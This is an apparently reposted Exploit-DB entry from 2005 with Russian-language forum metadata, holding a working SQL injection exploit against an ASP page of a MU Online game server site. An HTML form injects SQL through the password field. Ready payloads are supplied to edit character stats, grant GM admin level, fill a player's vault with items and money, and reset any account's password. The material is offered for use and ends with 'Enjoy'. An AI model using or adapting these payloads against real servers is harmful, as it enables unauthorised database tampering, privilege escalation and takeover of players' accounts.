- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1252
- Проверка EDB
-
- Пройдено
- Автор
- NUKEDX
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2005-10-15
HTML:
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples:
-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord
Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2
-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->
<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>
# milw0rm.com [2005-10-15]
- Источник
- www.exploit-db.com